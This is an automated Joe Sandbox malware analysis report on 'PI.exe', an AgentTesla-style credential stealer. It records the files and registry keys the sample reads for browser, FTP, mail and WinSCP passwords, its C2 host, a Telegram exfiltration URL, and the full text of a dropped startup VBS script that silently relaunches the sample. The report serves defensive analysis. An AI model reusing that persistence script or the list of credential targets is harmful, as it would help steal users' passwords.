Source: C:\Users\user\Desktop\PI.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_2_00405CA0
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,GetACP,	5_2_0040AD2C
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,	5_2_004099FC
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,	5_2_004099B0
Source: C:\Users\user\Desktop\PI.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_2_00405DAC
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,	7_2_0046CA4A

Source: C:\Users\user\Desktop\PI.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_00475588 GetSystemTime,ExitProcess,GetNextDlgTabItem,

0_2_00475588

Source: C:\Users\user\Desktop\PI.exe

Code function: 2_2_0233A502 GetUserNameW,

2_2_0233A502

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_00440F64 GetVersion,

0_2_00440F64

Source: C:\Users\user\Desktop\PI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: PI.exe, 00000000.00000002.680325895.000000000019D000.00000004.00000010.sdmp, PI.exe, 00000003.00000002.705494157.000000000019D000.00000004.00000010.sdmp, PI.exe, 00000005.00000002.707159490.000000000019D000.00000004.00000010.sdmp

Binary or memory string: avp.exe

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000002.00000002.941812642.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.941872630.0000000000475000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.942359260.0000000002180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.942468067.0000000002252000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.708227438.00000000027D5000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681442399.00000000027E5000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.943139633.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.705557320.0000000000475000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681329227.0000000002772000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.706213393.0000000000790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.707115774.0000000000BB2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.705125363.0000000000499000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.943293284.0000000002B8A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.942414784.00000000021E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.943432491.0000000002C69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI.exe PID: 6744, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI.exe PID: 6728, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI.exe PID: 6512, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI.exe PID: 5152, type: MEMORY
Source: Yara match	File source: 2.2.PI.exe.2180000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.bb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PI.exe.2180000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.790000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PI.exe.2250000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PI.exe.2760000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI.exe.2770000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.790000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PI.exe.21e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PI.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\PI.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\PI.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\PI.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\PI.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match

File source: Process Memory Space: PI.exe PID: 5152, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000002.00000002.941812642.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.941872630.0000000000475000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.942359260.0000000002180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.942468067.0000000002252000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.708227438.00000000027D5000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681442399.00000000027E5000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.943139633.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.705557320.0000000000475000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681329227.0000000002772000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.706213393.0000000000790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.707115774.0000000000BB2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.705125363.0000000000499000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.943293284.0000000002B8A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.942414784.00000000021E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.943432491.0000000002C69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI.exe PID: 6744, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI.exe PID: 6728, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI.exe PID: 6512, type: MEMORY
Source: Yara match	File source: Process Memory Space: PI.exe PID: 5152, type: MEMORY
Source: Yara match	File source: 2.2.PI.exe.2180000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.bb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PI.exe.2180000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.790000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PI.exe.2250000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PI.exe.2760000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PI.exe.2770000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.PI.exe.790000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PI.exe.21e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PI.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Startup Items1	Startup Items1	Disable or Modify Tools1	OS Credential Dumping2	System Time Discovery11	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting111	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information11	Input Capture11	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Registry Run Keys / Startup Folder2	Access Token Manipulation1	Scripting111	Credentials in Registry1	File and Directory Discovery3	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection412	Obfuscated Files or Information2	NTDS	System Information Discovery128	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder2	Software Packing41	LSA Secrets	Security Software Discovery271	SSH	Input Capture11	Data Transfer Size Limits	Application Layer Protocol11	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion15	VNC	Clipboard Data2	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion15	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection412	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PI.exe	52%	ReversingLabs	Win32.Trojan.LokiBot
PI.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.PI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
2.2.PI.exe.21e0000.2.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
7.2.PI.exe.bb0000.3.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.1.PI.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.PI.exe.2770000.3.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
2.2.PI.exe.2250000.3.unpack	100%	Avira	TR/Spy.Gen8	Download File
5.2.PI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
0.2.PI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
7.2.PI.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
5.2.PI.exe.2760000.3.unpack	100%	Avira	TR/Spy.Gen8	Download File
7.1.PI.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.PI.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205	Download File
7.2.PI.exe.b40000.2.unpack	100%	Avira	HEUR/AGEN.1138205	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://xmFob4yUwp.org	0%	Avira URL Cloud	safe
http://127.0.0.1:	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://xmFob4yUwp.org$	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://crl.identrust	0%	Avira URL Cloud	safe
http://ocsp.int-x3.letsencrypt.org0/	0%	URL Reputation	safe
http://ocsp.int-x3.letsencrypt.org0/	0%	URL Reputation	safe
http://ocsp.int-x3.letsencrypt.org0/	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hybridgroupco.com	66.70.204.222	true	true		unknown
mail.hybridgroupco.com	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://xmFob4yUwp.org	PI.exe, 00000002.00000002.943432491.0000000002C69000.00000004.00000001.sdmp, PI.exe, 00000002.00000002.943600197.0000000002D98000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:	PI.exe, PI.exe, 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/	PI.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	PI.exe, 00000000.00000002.681442399.00000000027E5000.00000040.00000001.sdmp, PI.exe, 00000002.00000002.941812642.0000000000402000.00000040.00000001.sdmp, PI.exe, 00000005.00000002.708227438.00000000027D5000.00000040.00000001.sdmp, PI.exe, 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.letsencrypt.org0	PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://xmFob4yUwp.org$	PI.exe, 00000002.00000002.943293284.0000000002B8A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.org/bot%telegramapi%/	PI.exe, PI.exe, 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp	false		high
http://cert.int-x3.letsencrypt.org/0	PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	PI.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.identrust	PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.int-x3.letsencrypt.org0/	PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.root-x1.letsencrypt.org0	PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
66.70.204.222	unknown	Canada		16276	OVHFR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321388
Start date:	21.11.2020
Start time:	09:21:28
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PI.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@16/2@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 90.7% (good quality ratio 87.9%) Quality average: 84.9% Quality standard deviation: 25.2%
HCA Information:	Successful, ratio: 83% Number of executed functions: 196 Number of non-executed functions: 321
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.139.144, 51.104.144.132, 52.155.217.156, 20.54.26.129, 2.20.142.210, 2.20.142.209, 51.104.139.180, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:22:33	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs
09:22:48	API Interceptor	800x Sleep call for process: PI.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
66.70.204.222	d9f83622ec1564600202a937d2414af8.exe	Get hash	malicious	Browse
	Image001.exe	Get hash	malicious	Browse
	mEPbT6Dbzc.exe	Get hash	malicious	Browse
	b32sUgpVdT.exe	Get hash	malicious	Browse
	ZXeB2BO1Lq.exe	Get hash	malicious	Browse
	kiGANMAmR3.exe	Get hash	malicious	Browse
	QM34U1x8I6.exe	Get hash	malicious	Browse
	Y2UrKCOaJm.exe	Get hash	malicious	Browse
	SJAOO8OCe3.exe	Get hash	malicious	Browse
	zh7966Pn0I.exe	Get hash	malicious	Browse
	o7B4zT1WNb.exe	Get hash	malicious	Browse
	emMAbUc8Xg.exe	Get hash	malicious	Browse
	a2onj1GOHs.exe	Get hash	malicious	Browse
	RDp6VoVSfQ.exe	Get hash	malicious	Browse
	DUE_INVOICE.exe	Get hash	malicious	Browse
	2M3ZdRze7b.exe	Get hash	malicious	Browse
	36n0FgVGxo.exe	Get hash	malicious	Browse
	ErKsKTqlS4.exe	Get hash	malicious	Browse
	yrPgLCinv1.exe	Get hash	malicious	Browse
	O0iCB546uj.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	https://faxfax.zizera.com/remittanceadvice	Get hash	malicious	Browse	167.114.119.127
	https://coralcliffs.com.do/review/	Get hash	malicious	Browse	188.165.231.37
	https://rugbysacele.ro/zz/IK/of1/nhctfwp4x278qkbusvijl6z39y5ema1o0gdr597irqhw4x0fk3uevzlaoj12bdmpsnt8g6yce40h6iv7bprsowxd3z2nmu8kal5gcj1yf9qt?data=dmluY2VudC5kdXNvcmRldEBpbWQub3Jn#aHR0cHM6Ly9ydWdieXNhY2VsZS5yby96ei9JSy9vZjEvNDUzMjY3NzY4JmVtYWlsPXZpbmNlbnQuZHVzb3JkZXRAaW1kLm9yZw==	Get hash	malicious	Browse	51.195.133.190
	http://flossdental.com.au	Get hash	malicious	Browse	46.105.201.240
	https://bit.ly/2UDM1To	Get hash	malicious	Browse	54.38.220.151
	inquiry-010.14.2020.doc	Get hash	malicious	Browse	94.23.162.163
	http://WWW.ALYSSA-J-MILANO.COM	Get hash	malicious	Browse	51.89.9.253
	http://septterror.tripod.com/the911basics.html	Get hash	malicious	Browse	51.89.9.253
	https://winnersoft.lu/systemadmin/?12=	Get hash	malicious	Browse	91.121.74.46
	https://carolearmstrongrealestate.com/wpe/14ea332d0684051d9fef033a5f1607dd?usr=cnBlbmRsZXRvbkBkYXRlc3dlaXNlci5jb20=	Get hash	malicious	Browse	51.38.157.153
	Order specs19.11.20.exe	Get hash	malicious	Browse	51.195.43.214
	QUOTE.exe	Get hash	malicious	Browse	51.89.1.123
	ORDER INQUIRY.exe	Get hash	malicious	Browse	51.91.236.193
	KYC_DOC_.EXE	Get hash	malicious	Browse	51.79.191.17
	MV GRAN LOBO 008.xlsx	Get hash	malicious	Browse	188.165.53.185
	MV GRAN LOBO 008.xlsx	Get hash	malicious	Browse	188.165.53.185
	d9f83622ec1564600202a937d2414af8.exe	Get hash	malicious	Browse	66.70.204.222
	direct_010.20.doc	Get hash	malicious	Browse	94.23.162.163
	#Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htm	Get hash	malicious	Browse	51.210.112.130
	https://duemiglia.com	Get hash	malicious	Browse	164.132.38.167

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs Download File
Process:	C:\Windows\SysWOW64\notepad.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	115
Entropy (8bit):	5.21081668642801
Encrypted:	false
SSDEEP:	3:DcdkiTGqLRVFGkxLbpCSUKRijsHot+WfW1s0IRkn:DGiqLTF7xPsSUK4YIwvm0zn
MD5:	E54054FC279ABBD8A620359997CC038C
SHA1:	D294DB0EB635954E1B56A289353447A302C743E9
SHA-256:	8F70AA584CF7DAB7F6E49EC1F919383E10AEBF1003D13942D7FC464B8454C43B
SHA-512:	C4478A5A604A7777A4648605BA245197268FE39288510EF35AB5043D3B6801B2B991DBCCB78C7CF86E952E6EC4ABAFC51D4AFAE352DAD7FD57F0C5D65715D40D
Malicious:	true
Reputation:	low
Preview:	sET DoMPeytCoqmYV = creAtEOBject("WscRIpT.sHELl")..dOmPeytCoqmyv.rUn """C:\Users\user\Desktop\PI.exe""", 0, False.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.891460444973993
TrID:	Win32 Executable (generic) a (10002005/4) 99.24% InstallShield setup (43055/19) 0.43% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	PI.exe
File size:	987648
MD5:	dbda32339a6965fefc794f220f944016
SHA1:	3e53b09125eb1e031f5f0e777836ba738b84fc42
SHA256:	c62b96f303f538748543747d1dacb97119dd9826b53ef6c8350b5b24d69f0006
SHA512:	be3282f1211845289f41775cd423312efca1a5cccfa5bfbf5a4baa31bb55b6067b0d40db3f82113c0166998c4bfd9459699bd0673acc68e3c5320244513a05fb
SSDEEP:	12288:hKXgLuyHgzDsn+cNObHRsVxFJkIHXAtijJZeTTaXF/c76r8bNKzkV2Xh:QGfgzIn+CA2VPJVRjJWTORc7U8xKIV2R
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	f0f06094c36ee8c2

Static PE Info

General
Entrypoint:	0x475a24
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9ff85556c80c0bd14a575736c76ce536

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00475834h
call 00007FCC44AA4E3Dh
mov eax, dword ptr [0049111Ch]
mov eax, dword ptr [eax]
call 00007FCC44AF3BD5h
mov ecx, dword ptr [00491214h]
mov eax, dword ptr [0049111Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [00475350h]
call 00007FCC44AF3BD5h
mov eax, dword ptr [0049111Ch]
mov eax, dword ptr [eax]
call 00007FCC44AF3C49h
call 00007FCC44AA2934h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
